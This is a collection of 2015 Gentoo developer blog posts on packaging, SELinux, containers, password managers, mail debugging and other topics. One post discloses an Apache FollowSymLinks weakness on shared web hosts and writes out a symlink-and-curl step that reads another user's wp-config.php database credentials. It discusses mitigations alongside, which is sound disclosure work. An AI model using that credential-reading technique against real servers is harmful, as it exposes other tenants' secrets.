Zack Medico a.k.a. zmedico (homepage, bugs)

I’ve created a utility called tardelta (ebuild available) that people using containers may be interested in. Here’s the README:

It is possible to optimize docker containers such that multiple containers are based off of a single copy of a common base image. If containers are constructed from tarballs, then it can be useful to create a delta tarball which contains the differences between a base image and a derived image. The delta tarball can then be layered on top of the base image using a Dockerfile like the following:

FROM base
ADD delta.tar.xz /

Many different types of containers can thus be derived from a common base image, while sharing a single copy of the base image. This saves disk space, and can also reduce memory consumption since it avoids having duplicate copies of base image data in the kernel’s buffer cache.
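Building and running a derived image from such a Dockerfile is then just the usual Docker workflow; a sketch, with made-up image names and delta.tar.xz assumed to sit next to the Dockerfile:

$ docker build -t myapp:derived .
$ docker run --rm -it myapp:derived /bin/sh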

July 05, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Intermediate policies (July 05, 2015, 16:17 UTC)

When developing SELinux policies for new software (or existing ones whose policies I don’t agree with) it is often more difficult to finish the policies so that they are broadly usable. When dealing with personal policies, having them “just work” is often sufficient. To make the policies reusable for distributions (or for the upstream project), a number of things are necessary:

  • Try structuring the policy using the style as suggested by refpolicy or Gentoo
  • Add the role interfaces that are most likely to be used or required, or which are in the current draft implemented differently
  • Refactor some of the policies to use refpolicy/Gentoo style interfaces
  • Remove the comments from the policies (as refpolicy does not want too verbose policies)
  • Change or update the file context definitions for default installations (rather than the custom installations I use)

This often takes quite some effort. Some of these changes (such as the style updates and commenting) are even counterproductive for me personally (in the sense that I don’t gain any value from doing so and would have to start maintaining two different policy files for the same policy), and necessary only for upstreaming policies. As a result, I often finish with policies that I just leave for me personally or somewhere on a public repository (like these Neo4J and Ceph policies), without any activities already scheduled to attempt to upstream those.

But not contributing the policies to a broader public means that the effort is not known, and other contributors might be struggling with creating policies for their favorite (or necessary) technologies. So the majority of policies that I write I still hope to eventually push them out. But I noticed that these last few steps for upstreaming (the ones mentioned above) might only take a few hours of work, but take me over 6 months (or more) to accomplish (as I often find other stuff more interesting to do).

I don’t know yet how to change the process to make it more interesting to use. However, I do have a couple of wishes that might make it easier for me, and perhaps others, to contribute:

  • Instead of reacting on contribution suggestions, work on a common repository together. Just like with a wiki, where we don’t aim for a 100% correct and well designed document from the start, we should use the strength of the community to continuously improve policies (and to allow multiple people to work on the same policy). Right now, policies are a one-man publication with a number of people commenting on the suggested changes and asking the one person to refactor or update the change himself.
  • Document the style guide properly, but don’t disallow contributions if they do not adhere to the style guide completely. Instead, merge and update. On successful wikis there are even people that update styles without content updates, and their help is greatly appreciated by the community.
  • If a naming convention is to be followed (which is the case with policies) make it clear. Too often the name of an interface is something that takes a few days of discussion. That’s not productive for policy development.
  • Find a way to truly create a “core” part of the policy and a modular/serviceable approach to handle additional policies. The idea of the contrib/ repository was like that, but failed to live up to its expectations: the number of people who have commit access to the contrib is almost the same as to the core, a few exceptions notwithstanding, and whenever policies are added to contrib they often require changes on the core as well. Perhaps even support overlay-type approaches to policies so that intermediate policies can be “staged” and tested by a larger audience before they are vetted into the upstream reference policy.
  • Settle on how to deal with networking controls. My suggestion would be to immediately support the TCP/UDP ports as assigned by IANA (or another set of sources) so that additional policies do not need to wait for the base policy to support the ports. Or find and support a way for contributions to declare the port types themselves (we probably need to focus on CIL for this).
  • Document “best practices” on policy development where certain types of policies are documented in more detail. For instance, desktop application profiles, networked daemons, user roles, etc. These best practices should not be mandatory and should in fact support a broad set of privilege isolation. With the latter, I mean that there are policies who cover an entire category of systems (init systems, web servers), a single software package or even the sub-commands and sub-daemons of that package. It would surprise me if this can’t be supported better out-of-the-box (as in, through a well thought-through base policy framework and styleguide).

I believe that this might create a more active community surrounding policy development.

July 03, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
KDEPIM without Akonadi (July 03, 2015, 14:16 UTC)

As you know, Gentoo is all about flexibility. You can run bleeding edge code (portage, our package manager, even provides you with installation from git master KF5 and friends) or you can focus on stability and trusted code. This is why, for the past few years, we have been offering our users KDEPIM 4.4.11.1 (the version where KMail e-mail storage was not yet integrated with Akonadi, also known as KMail1) as a drop-in replacement for the newer versions.
Recently the Nepomuk search framework has been replaced by Baloo, and after some discussion we decided that it is now time for the Nepomuk-related packages to go. The problem is that the old KDEPIM packages still depend on it via their Akonadi version. This is why - for those of our users who prefer to run KDEPIM 4.4 / KMail1 - we've decided to switch to Pali Rohár's kdepim-noakonadi fork (see also his 2013 blog post and the code). The packages are right now in the KDE overlay, but will move to the main tree after a few days of testing and be treated as an update of KDEPIM 4.4.11.1.
The fork is essentially KDEPIM 4.4 including some additional bugfixes from the KDE/4.4 git branch, with KAddressbook patched back to its KDEPIM 4.3 state and references to Akonadi removed elsewhere. This is in some ways a functionality regression, since the integration of e.g. different calendar types is lost; however, in that version it never really worked perfectly anyway.

For now, you will still need the akonadi-server package, since kdepimlibs (outside kdepim and now at version 4.14.9) requires it to build, but you'll never need to start the Akonadi server. As a consequence, Nepomuk support can be disabled everywhere, and the Nepomuk core and client and Akonadi client packages can be removed by the package manager (--depclean, make sure to first globally disable the nepomuk useflag and rebuild accordingly).
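A sketch of that clean-up sequence (the exact USE line depends on what else is in your /etc/portage/make.conf):

# add -nepomuk to the USE variable in /etc/portage/make.conf, then:
emerge --ask --update --deep --newuse @world
emerge --ask --depclean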

You might ask "Why are you still doing this?"... well. I've been told Akonadi and Baloo are working very nicely, and again I've considered upgrading all my installations... but then on my work desktop, where I am using the newest and greatest KDE4PIM, bug 338658 pops up regularly and stops syncing of important folders. I just don't have the time to pointlessly dig deep into the Akonadi database every few days. So KMail1 it is, and I'll rather spend some time occasionally picking and backporting bugfixes.

June 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LastPass got hacked, I'm still okay with it (June 27, 2015, 13:23 UTC)

So LastPass was compromised, as they themselves report. I'm sure there are plenty of smug geeks out there, happy about users being compromised. I thought that this is the right time to remind people why I'm a LastPass user and will stay a LastPass user even after this.

The first part is a matter of trust in the technology. If I did not trust LastPass enough to believe that they do not have easy access to the decrypted content, I wouldn't be using it to begin with. And since my trust is in the technology rather than in the LastPass operators, even if the encrypted vault were compromised (and they say it wasn't), I wouldn't worry too much.

On the other hand, I followed the obvious course of not only changing the master password, but also changing the important passwords, just to be paranoid. This is actually one good side of LastPass — changing the passwords that really matter is very easy, as they instrument the browser, so Facebook, Twitter, Amazon, PayPal, … are one click away from a new, strong password.

Once again, the main reason why I suggest tools such as LastPass (and I like LastPass, but that's just preference) is that they are easy to use, and easy to use means people will use them. Making tools that are perfectly secure in theory but very hard to use just means people will not use them, full stop. A client-side certificate is much more secure than a password, but at the same time procuring one and using it properly is non-trivial so in my experience only a handful of services use that — I know of a couple of banks in Italy, and of course StartSSL and similar providers.

The problem with offline services is that, for the most part, they don't allow good access from phones, for instance. So for the things you use often from the phone, you end up choosing memorable passwords. But memorable passwords are usually fairly easy to crack, unless you use known methods and long passwords — although at least it's not the case, like I read on Arse^H recently, that since we know the md5 hash for "mom", any password containing that string anywhere is weakened.

Let's take an example away from the password vaults. In Ireland (and I assume the UK, simply because the local systems are essentially the same in many aspects), banks have this bollocks idea that it is more secure to ask for some of the characters of a password rather than the full password. I think this is a remnant of old bank teller protocols, as I remember reading about that in The Art of Deception (good read, by the way.)

While in theory picking a random part of the password means a phishing attempt would never get the full password, and thus won't be able to access the bank's website unless they are very lucky and get exactly the same three indexes over and over, it is a frustrating experience.

My first bank, AIB, used a five-digits PIN, and then select three digits out of it when I log in, which is not really too difficult to memorize. On the other hand, on their mobile app they decided that the right way to enter the numbers is by using drop-down boxes (sigh.) My current bank, Ulster Bank/RBS, uses a four digits pin, plus a variable length password, which I generated through LastPass as 20 characters, before realizing how bad that is, because it means I now get asked three random digits off the four... and three random characters of the 20.

Let that sink in a moment: they'll ask me for the second, fifth and sixteenth character of a twenty characters randomly generated password. So no auto-fill, no copy-paste, no password management software assisted login. Of course most people here would just not bother and go with a simple password they can remember. Probably made of multiple words of the same length (four letters? five?) so that it becomes easy to count which one is the first character of the fourth word (sixteenth character of the password.) Is it any more secure?

I think I'll write a separate blog post about banks apps and website security mis-practices because it's going to be a long topic and one I want to write down properly so I can forward it to my bank contacts, even though it won't help with anything.

Once again, my opinion is that any time you make security a complicated feature, you're actually worsening the practical security, even if your ideas are supposed to improve the theoretical one. And that includes insisting on the perfect solution for password storage.

June 26, 2015
Mike Pagano a.k.a. mpagano (homepage, bugs)
kdbus in gentoo-sources (June 26, 2015, 23:35 UTC)

 

Keeping with the theme of “Gentoo is about choice”, I’ve added the ability for users to include kdbus in their gentoo-sources kernel.  I wanted an easy way for Gentoo users to test the patchset while keeping the default installation of not having it at all.

In order to include the patchset on your gentoo-sources you’ll need the following:

1. A kernel version >= 4.1.0-r1

2. the ‘experimental’ use flag

3. the ‘kdbus’ use flag
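Putting the three requirements above together, the setup boils down to something like this (same USE flags as listed; use whatever >=4.1.0-r1 kernel version you want to run):

# echo "sys-kernel/gentoo-sources kdbus experimental" >> /etc/portage/package.use/kdbus
# emerge --ask ">=sys-kernel/gentoo-sources-4.1.0-r1"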

I am not a systemd user, but from the ebuild it looks like if you build systemd with the ‘kdbus’ use flag it will use it.

Please send all kdbus bugs upstream by emailing the developers and including linux-kernel@vger.kernel.org in the CC.

Read as much as you can about kdbus before you decide to build it into your kernel.  There have been security concerns mentioned (warranted or not), so following the upstream patch review at lkml.org would probably be prudent.

When a new version is released, wait a week before opening a bug.  Unless I am on vacation, I will most likely have it included before the week is out. Thanks!

NOTE: This is not some kind of Gentoo endorsement of kdbus.  Nor is it a Mike Pagano endorsement of kdbus.  This is no different from some of the other optional and experimental patches we carry.  I do all the genpatches work, which includes the patches, the ebuilds and the bugs; since I don’t mind the extra work of keeping this up to date, I can’t see any reason not to include it as an option.

 

 

June 25, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
KDE Plasma 5.3.1 testing (June 25, 2015, 23:15 UTC)

After several months of packaging in the kde overlay and almost a month in tree, we have lifted the mask for KDE Plasma 5.3.1 today. If you want to test it out, here is some information on how to get it.

For easy transition we provide two new profiles, one for OpenRC and the other for systemd.

root # eselect profile list
...
[8] default/linux/amd64/13.0/desktop/plasma
[9] default/linux/amd64/13.0/desktop/plasma/systemd
...

Following example activates the Plasma systemd profile:

root # eselect profile set 9

On stable systems you need to unmask the qt5 use flag:

root # echo "-qt5" >> /etc/portage/profile/use.stable.mask

Any packages affected by the profile change need to be rebuilt:

root # emerge -avuND @world

For stable users, you also need to keyword the required packages. You can let portage handle it with its autounmask feature, or just grab the keyword files for KDE Frameworks 5.11 and KDE Plasma 5.3.1 from the kde overlay.

Now just install it (this is full Plasma 5, the basic desktop would be kde-plasma/plasma-desktop):

root # emerge -av kde-plasma/plasma-meta

KDM is not supported for Plasma 5 anymore, so if you have installed it kill it with fire. Possible and tested login managers are SDDM and LightDM.

For detailed instructions read the full upgrade guide. Package bugs can be filed to bugs.gentoo.org and about the software to bugs.kde.org.

Have fun,
the Gentoo KDE Team

June 23, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr Most servers running a multi-user webhosting setup with Apache HTTPD probably have a security problem. Unless you're using Grsecurity there is no easy fix.

I am part of a small webhosting business that I have been running as a side project for quite a while. We offer customers user accounts on our servers running Gentoo Linux, and webspace with the typical Apache/PHP/MySQL combination. We recently became aware of a security problem involving symlinks. I wanted to share this, because I was appalled by the fact that there was no obvious solution.

Apache has an option FollowSymLinks which basically does what it says. If a symlink in a webroot is accessed the webserver will follow it. In a multi-user setup this is a security problem. Here's why: If I know that another user on the same system is running a typical web application - let's say Wordpress - I can create a symlink to his config file (for Wordpress that's wp-config.php). I can't see this file with my own user account. But the webserver can see it, so I can access it with the browser over my own webpage. As I'm usually allowed to disable PHP I'm able to prevent the server from interpreting the file, so I can read the other user's database credentials. The webserver needs to be able to see all files, therefore this works. While PHP and CGI scripts usually run with user's rights (at least if the server is properly configured) the files are still read by the webserver. For this to work I need to guess the path and name of the file I want to read, but that's often trivial. In our case we have default paths in the form /home/[username]/websites/[hostname]/htdocs where webpages are located.
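To make the attack concrete, here is a sketch using the hypothetical default paths and the Wordpress example from above, run as the attacking user whose own webroot is served by the same Apache:

$ ln -s /home/victim/websites/victim.example/htdocs/wp-config.php \
      /home/attacker/websites/attacker.example/htdocs/peek.txt
$ curl http://attacker.example/peek.txt    # Apache follows the symlink and can read the file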

So the obvious solution one might think about is to disable the FollowSymLinks option and forbid users to set it themselves. However symlinks in web applications are pretty common and many will break if you do that. It's not feasible for a common webhosting server.

Apache supports another Option called SymLinksIfOwnerMatch. It's also pretty self-explanatory, it will only follow symlinks if they belong to the same user. That sounds like it solves our problem. However there are two catches: First of all the Apache documentation itself says that "this option should not be considered a security restriction". It is still vulnerable to race conditions.

But even leaving the race condition aside, it doesn't really work. Web applications using symlinks will usually try to set FollowSymLinks in their .htaccess file. An example is Drupal, which by default ships with such an .htaccess file. If you forbid users to set FollowSymLinks, the option won't just be ignored: the whole webpage won't run and will simply return an error 500. What you could do is change the FollowSymLinks option in the .htaccess manually to SymlinksIfOwnerMatch. While this may be feasible in some cases, when you have a lot of users you don't want to have to explain to all of them that, if they want to install some common web application, they have to manually edit a file they don't understand. (There's a bug report for Drupal asking to change FollowSymLinks to SymlinksIfOwnerMatch, but it's been ignored for several years.)

So using SymLinksIfOwnerMatch is neither secure nor really feasible. The documentation for Cpanel discusses several possible solutions. The recommended solutions require proprietary modules. None of the proposed fixes work with a plain Apache setup, which I think is a pretty dismal situation. The most common web server has a severe security weakness in a very common situation and no usable solution for it.

The one solution that we chose is a feature of Grsecurity. Grsecurity is a Linux kernel patch that greatly enhances security, and we've been very happy with it in the past. There are a lot of reasons to use this patch; I'm often impressed by how frequently local root exploits just don't work on a Grsecurity system.

Grsecurity has an option like SymlinksIfOwnerMatch (CONFIG_GRKERNSEC_SYMLINKOWN) that operates on the kernel level. You can define a certain user group (which in our case is the "apache" group) for which this option will be enabled. For us this was the best solution, as it required very little change.

I haven't checked this, but I'm pretty sure that we are not alone with this problem. I'd guess that a lot of shared web hosting companies are vulnerable to it.

Here's the German blog post on our webpage and here's the original blogpost from an administrator at Uberspace (also German) which made us aware of this issue.

June 21, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Perl 5.22 testers needed! (June 21, 2015, 08:14 UTC)

Gentoo users rejoice: for a few days now we have had Perl 5.22.0 packaged in the main tree. Since we don't know yet how much stuff will break because of the update, it is masked for now. Which means, we need daring testers (preferably running ~arch systems; stable is also fine but may need more work on your part to get things running) who unmask the new Perl, upgrade, and file bugs if needed!!!
Here's what you need in /etc/portage/package.unmask (and possibly package.accept_keywords) to get started (download); please always use the full block, since partial unmasking will lead to chaos. We're looking forward to your feedback!
# Perl 5.22.0 mask / unmask block
=dev-lang/perl-5.22.0
=virtual/perl-Archive-Tar-2.40.0
=virtual/perl-Attribute-Handlers-0.970.0
=virtual/perl-B-Debug-1.230.0
=virtual/perl-CPAN-2.110.0
=virtual/perl-CPAN-Meta-2.150.1
=virtual/perl-CPAN-Meta-Requirements-2.132.0
=virtual/perl-Carp-1.360.0
=virtual/perl-Compress-Raw-Bzip2-2.68.0
=virtual/perl-Compress-Raw-Zlib-2.68.0
=virtual/perl-DB_File-1.835.0
=virtual/perl-Data-Dumper-2.158.0
=virtual/perl-Devel-PPPort-3.310.0
=virtual/perl-Digest-MD5-2.540.0
=virtual/perl-Digest-SHA-5.950.0
=virtual/perl-Exporter-5.720.0
=virtual/perl-ExtUtils-CBuilder-0.280.221
=virtual/perl-ExtUtils-Command-1.200.0
=virtual/perl-ExtUtils-Install-2.40.0
=virtual/perl-ExtUtils-MakeMaker-7.40.100_rc
=virtual/perl-ExtUtils-ParseXS-3.280.0
=virtual/perl-File-Spec-3.560.0
=virtual/perl-Filter-Simple-0.920.0
=virtual/perl-Getopt-Long-2.450.0
=virtual/perl-HTTP-Tiny-0.54.0
=virtual/perl-IO-1.350.0
=virtual/perl-IO-Compress-2.68.0
=virtual/perl-IO-Socket-IP-0.370.0
=virtual/perl-JSON-PP-2.273.0
=virtual/perl-Locale-Maketext-1.260.0
=virtual/perl-MIME-Base64-3.150.0
=virtual/perl-Math-BigInt-1.999.700
=virtual/perl-Math-BigRat-0.260.800
=virtual/perl-Module-Load-Conditional-0.640.0
=virtual/perl-Module-Metadata-1.0.26
=virtual/perl-Perl-OSType-1.8.0
=virtual/perl-Pod-Escapes-1.70.0
=virtual/perl-Pod-Parser-1.630.0
=virtual/perl-Pod-Simple-3.290.0
=virtual/perl-Safe-2.390.0
=virtual/perl-Scalar-List-Utils-1.410.0
=virtual/perl-Socket-2.18.0
=virtual/perl-Storable-2.530.0
=virtual/perl-Term-ANSIColor-4.30.0
=virtual/perl-Term-ReadLine-1.150.0
=virtual/perl-Test-Harness-3.350.0
=virtual/perl-Test-Simple-1.1.14
=virtual/perl-Text-Balanced-2.30.0
=virtual/perl-Text-ParseWords-3.300.0
=virtual/perl-Time-Piece-1.290.0
=virtual/perl-Unicode-Collate-1.120.0
=virtual/perl-XSLoader-0.200.0
=virtual/perl-autodie-2.260.0
=virtual/perl-bignum-0.390.0
=virtual/perl-if-0.60.400
=virtual/perl-libnet-3.50.0
=virtual/perl-parent-0.232.0
=virtual/perl-threads-2.10.0
=virtual/perl-threads-shared-1.480.0
=dev-perl/Test-Tester-0.114.0
=dev-perl/Test-use-ok-0.160.0

# end of the Perl 5.22.0 mask / unmask block
After the update, first run
emerge --depclean --ask
and afterwards
perl-cleaner --all
perl-cleaner should not need to do anything, ideally. If you have depcleaned first and it still wants to rebuild something, that's a bug. Please file a bug report for the package that is getting rebuilt (but check our wiki page on known Perl 5.22 issues first to avoid duplicates).


June 20, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hello!

I had heard about Krautreporter both through my brother and through the “Jung & Naiv” videos by Tilo Jung.
I am very happy with my membership as a reader: I have not used many of the extras, but I did listen in here and there to a members-only podcast (“Viertel vor Feierabend”) and also took the opportunity to get to know the editorial team a little better in person at their anniversary.

I am definitely staying on for a second year, not as an experiment but because of the articles: lots of exciting material among them. Things I personally found exciting include, for example,

and from Theresa Bäuerlein I still have several bookmarked articles that I will make time for.

I very much hope that Krautreporter can survive. Maybe real journalism without advertising is something for you too? More details here:

June 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Recently, I wrote an article about amavisd not running with Postfix and giving a “Connection refused to 127.0.0.1” error message that wasn’t easy to diagnose. Yesterday, I ran into another problem with amavisd refusing to start properly, and I wasn’t readily able to figure out why. By default, amavisd logs to your mail log, which for me is located at /var/log/mail.log but could be different for you based on your syslogger preferences. The thing is, though, that it will not log start-up errors there. So basically, you are seemingly left in the dark if you start amavisd and then realise immediately thereafter that it isn’t running.

I decided to take a look at the init script for amavisd, and saw that there were some non-standard functions in it:


# grep 'extra_commands' /etc/init.d/amavisd
extra_commands="debug debug_sa"

These extra commands map to the following functions:


debug() {
ebegin "Starting ${progname} in debug mode"
"${prog}" debug
eend $?
}

debug_sa() {
ebegin "Starting ${progname} in debug-sa mode"
"${prog}" debug-sa
eend $?
}

Though these extra commands may be Gentoo-specific, they are pretty easy to implement on other distributions by directly calling the binary itself. For instance, if you wanted the debug function, it would be the location of the binary with ‘debug’ appended to it. On my system, that would be:


/usr/sbin/amavisd -c $LOCATION_OF_CONFIG_FILE debug

replacing the $LOCATION_OF_CONFIG_FILE with your actual config file location.

When I started amavisd in debug mode, the start-up problem that it was having became readily apparent:


# /etc/init.d/amavisd debug
* Starting amavisd-new in debug mode ...
Jun 18 12:48:21.948 /usr/sbin/amavisd[4327]: logging initialized, log level 5, syslog: amavis.mail
Jun 18 12:48:21.948 /usr/sbin/amavisd[4327]: starting. /usr/sbin/amavisd at amavisd-new-2.10.1 (20141025), Unicode aware, LANG="en_GB.UTF-8"

Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: Net::Server: 2015/06/18-12:48:22 Amavis (type Net::Server::PreForkSimple) starting! pid(4327)
Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: (!)Net::Server: 2015/06/18-12:48:22 Unresolveable host [::1]:10024 - could not load IO::Socket::INET6: Can't locate Socket6.pm in @INC (you may need to install the Socket6 module) (@INC contains: lib /etc/perl /usr/local/lib64/perl5/5.20.2/x86_64-linux /usr/local/lib64/perl5/5.20.2 /usr/lib64/perl5/vendor_perl/5.20.2/x86_64-linux /usr/lib64/perl5/vendor_perl/5.20.2 /usr/local/lib64/perl5 /usr/lib64/perl5/vendor_perl/5.20.1/x86_64-linux /usr/lib64/perl5/vendor_perl/5.20.1 /usr/lib64/perl5/vendor_perl /usr/lib64/perl5/5.20.2/x86_64-linux /usr/lib64/perl5/5.20.2) at /usr/lib64/perl5/vendor_perl/5.20.1/Net/Server/Proto.pm line 122.\n\n at line 82 in file /usr/lib64/perl5/vendor_perl/5.20.1/Net/Server/Proto.pm
Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: Net::Server: 2015/06/18-12:48:22 Server closing!

In that output, the actual error indicates that it couldn’t find the Perl module IO::Socket::INET6. This problem was easily fixed in Gentoo with emerge -av dev-perl/IO-Socket-INET6, but could be rectified by installing the module from your distribution’s repositories, or by using CPAN. In my case, it was caused by my recent compilation and installation of a new kernel that, this time, included IPv6 support.

The point of my post, however, wasn’t about my particular problem with amavisd starting, but rather how one can debug start-up problems with the daemon. Hopefully, if you run into woes with amavisd logging, these debug options will help you track down the problem.

Cheers,
Zach

June 14, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
European Xiangqi stickers (Chinese chess) (June 14, 2015, 21:58 UTC)

Hello!

For quite a while I had been looking, without luck, for someone to design European piece graphics for Xiangqi (Chinese chess). Fortunately, early this March I was pointed to Jasmin Scharrer!

The pieces she designed made it possible to create sheets of stickers that help kickstart the learning experience for people new to the game who are facing Chinese-only gaming hardware: you put the stickers on the back of the pieces and turn them over whenever you are ready to – only some at first and then some more, or all at once, your choice.

This is what the stickers look like on real hardware:

The full sticker sheet takes an A4 page and looks like this:

To print your own, you should use the vector version for quality.

Since we picked CC-BY-4.0 as the license, you could even sell your prints, as long as proper attribution to

Jasmin Scharrer (original artwork, http://jasminscharrer.com/),
Sebastian Pipping (post-processing, https://blog.hartwork.org/)

for the initial source is given.

Using the same piece graphics, xiangqi-setup now also has a piece theme “euro_xiangqi_js”. With that, you can render European setup images like this one:

$ xiangqi-setup --pieces euro_xiangqi_js --width-cm 7 doc/demo.wxf \
      output.svg

If you need help with any of this, or have feedback in general, please feel free to contact me at sebastian@pipping.org. Best, Sebastian

June 13, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Where does CIL play in the SELinux system? (June 13, 2015, 21:12 UTC)

SELinux policy developers already have a number of file formats to work with. Currently, policy code is written in a set of three files:

  • The .te file contains the SELinux policy code (type enforcement rules)
  • The .if file contains functions which turn a set of arguments into blocks of SELinux policy code (interfaces). These functions are called by other interface files or type enforcement files
  • The .fc file contains mappings of file path expressions towards labels (file contexts)

These files are compiled into loadable modules (or a base module) which are then transformed to an active policy. But this is not a single-step approach.

Transforming policy code into policy file

For the Linux kernel SELinux subsystem, only a single file matters – the policy.## file (for instance policy.29). The suffix denotes the binary format version: higher numbers mean that additional SELinux features are supported, which require a different binary format for the SELinux code in the Linux kernel.
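For instance, the highest policy version that the running kernel supports can be read from selinuxfs (just a quick check, nothing you need to do by hand during a policy build):

~# cat /sys/fs/selinux/policyvers
29
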

With the 2.4 userspace, the transformation of the initial files as mentioned above towards a policy file is done as follows:

When a developer builds a policy module, first checkmodule is used to build a .mod intermediate file. This file contains the type enforcement rules with the expanded rules of the various interface files. Next, semodule_package is called which transforms this intermediate file, together with the file context file, into a .pp file.

This .pp file is, in the 2.4 userspace, called a “high level language” file. There is little high-level about it, but the idea is that such high-level language files are then transformed into .cil files (CIL stands for Common Intermediate Language). If at any moment other frameworks come around, they could create high-level languages themselves and provide a transformation engine to convert these HLL files into CIL files.

For the current .pp files, this transformation is supported through the /usr/libexec/selinux/hll/pp binary which, given a .pp file, outputs CIL code.

Finally, all CIL files (together) are compiled into a binary policy.29 file. All the steps coming from a .pp file towards the final binary file are handled by the semodule command. For instance, if an administrator loads an additional .pp file, its (generated) CIL code is added to the other active CIL code and together, a new policy binary file is created.
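To make this a bit more tangible, here is a rough sketch of the individual steps for a single module (the module name is made up, and in practice the policy build system and semodule take care of most of this for you):

~$ checkmodule -M -m -o testmod.mod testmod.te                  # .te (with expanded interfaces) -> .mod
~$ semodule_package -o testmod.pp -m testmod.mod -f testmod.fc  # .mod + .fc -> .pp
~$ /usr/libexec/selinux/hll/pp < testmod.pp > testmod.cil       # what semodule does behind the scenes
~# semodule -i testmod.pp                                       # load, rebuilding the binary policy from all CIL code
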

Adding some CIL code

The SELinux userspace development repository contains a secilc command which can compile CIL code into a binary policy file. As such, it can perform the (very) last step of the file conversions above. However, it is not integrated with the module store, so when additional code is added, the administrator cannot simply “play” with it as he would with SELinux policy modules.

Still, that shouldn’t prohibit us from playing around with it to experiment with the CIL language construct. Consider the following CIL SELinux policy code:

; Declare a test_port_t type
(type test_port_t)
; Assign the type to the object_r role
(roletype object_r test_port_t)

; Assign the right set of attributes to the port
(typeattributeset defined_port_type test_port_t)
(typeattributeset port_type test_port_t)

; Declare tcp:1440 as test_port_t
(portcon tcp 1440 (system_u object_r test_port_t ((s0) (s0))))

The code declares a port type (test_port_t) and uses it for the TCP port 1440.

In order to use this code, we have to build a policy file which includes all currently active CIL code, together with the test code:

~$ secilc -c 29 /var/lib/selinux/mcs/active/modules/400/*/cil testport.cil

The result is a policy.29 file (the command forces version 29, as the Linux kernel used on this system does not support version 30), which can now be copied to /etc/selinux/mcs/policy. Then, after having copied the file, load the new policy using load_policy.

And lo and behold, the port type is now available:

~# semanage port -l | grep 1440
test_port_t           tcp      1440

To verify that it really is available and not just parsed by the userspace, let’s connect to it and hope for a nice denial message:

~$ ssh -p 1440 localhost
ssh: connect to host localhost port 1440: Permission denied

~$ sudo ausearch -ts recent
time->Thu Jun 11 19:35:45 2015
type=PROCTITLE msg=audit(1434044145.829:296): proctitle=737368002D700031343430006C6F63616C686F7374
type=SOCKADDR msg=audit(1434044145.829:296): saddr=0A0005A0000000000000000000000000000000000000000100000000
type=SYSCALL msg=audit(1434044145.829:296): arch=c000003e syscall=42 success=no exit=-13 a0=3 a1=6d4d1ce050 a2=1c a3=0 items=0 ppid=2005 pid=18045 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts0 ses=1 comm="ssh" exe="/usr/bin/ssh" subj=staff_u:staff_r:ssh_t:s0 key=(null)
type=AVC msg=audit(1434044145.829:296): avc:  denied  { name_connect } for  pid=18045 comm="ssh" dest=1440 scontext=staff_u:staff_r:ssh_t:s0 tcontext=system_u:object_r:test_port_t:s0 tclass=tcp_socket permissive=0

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Artificial regions, real risks (June 13, 2015, 14:20 UTC)

In the last posts where I talked about what I call "artificial regions", I was complaining about the problems of ping-ponging between the US and Italy, and then moving to Dublin. Those first-world problems are now mostly (but not fully) solved and not really common, so I wouldn't call them "real" for most people.

What I ignored in that series of posts, though, was the region-locking applied by Big Content providers, particularly with regard to movies, TV series, and so on. This was because it's a problem that is already way too obvious, and there isn't much one can add to it at this point: it has been written about, illustrated and argued over for years by now.

The reason why I'm going back to this now, though, is that there has recently been news of yet another scam, to the detriment of final consumers, connected to a common way of working around artificial region limitations. But first, let me point out the obvious: in this post I'm not talking about the out-and-out piracy option of downloading content straight from The Pirate Bay or anything along those lines. I'm instead going to focus on those people who either pay for a service, or want to pay for content, but are blocked by the artificial regions set up for content.

I'll use as my first example Comixology, of which I'm a customer, because I like comics but travel too much to bring them with me physically; more importantly, they would just add to the amount of things I'd have to move if I decide to change place. Unlike many other content providers, Comixology uses multiple regional segregation approaches: your payment card billing address decides which website you can use, which actually only changes how much you're paying; the IP you're coming from decides which content you can buy. Luckily, they still let you access paid content even if your IP no longer matches the one you bought it from.

This is not really well documented, by the way. Some time ago they posted on their G+ page that they had made a deal with a manga distributor so that more content was available; I took the chance to buy a bunch of Bleach issues (but not all of them), as I had not finished watching the anime due to other issues in the past, and I wanted to catch up on my own terms. But a few weeks later, when I wanted to buy more because I had finished the stash… I couldn't. I thought they had broken off the deal, since there was no reference to it on the website or app, so I gave up… until they posted a sale, and I saw that they did list Bleach, but the link brought me to a "Page not Found" entry.

Turns out that they admitted on Twitter that, due to the way the rights for the content go, they are not allowed to sell manga outside of the States, and even though they do validate my billing address (I use my American debit card there) they seem to ignore it and only care about where they think you are physically located at the moment. Which is kind of strange, given that it means you can buy manga from them if you've got a European account and just so happen to travel to the United States.

Admittedly, this is by far not something that only happens with this website. In particular, Google Play Movies used to behave this way: you could buy content while abroad, but you would be stopped from downloading it (though if you had already downloaded it, you could still play it). This was unlike Apple, which always tied availability and behaviour to the country your iTunes account was registered in, verified by the billing address of the connected payment card — or alternatively faked and paid for with country-specific iTunes gift cards.

One "easy" way to work around this is to use VPN services to work around IP-based geographical restrictions. The original idea of a VPN is to connect multiple LANs, or a remote client to a LAN, in a secure way. While there is some truth about the security of this, lots of it is actually vapourware, due to so many technical hurdles of actually securing a LAN, that the current trend is to not rely on VPNs at all. But then again, VPNs allow you to change where your Internet egress is, which is handy.

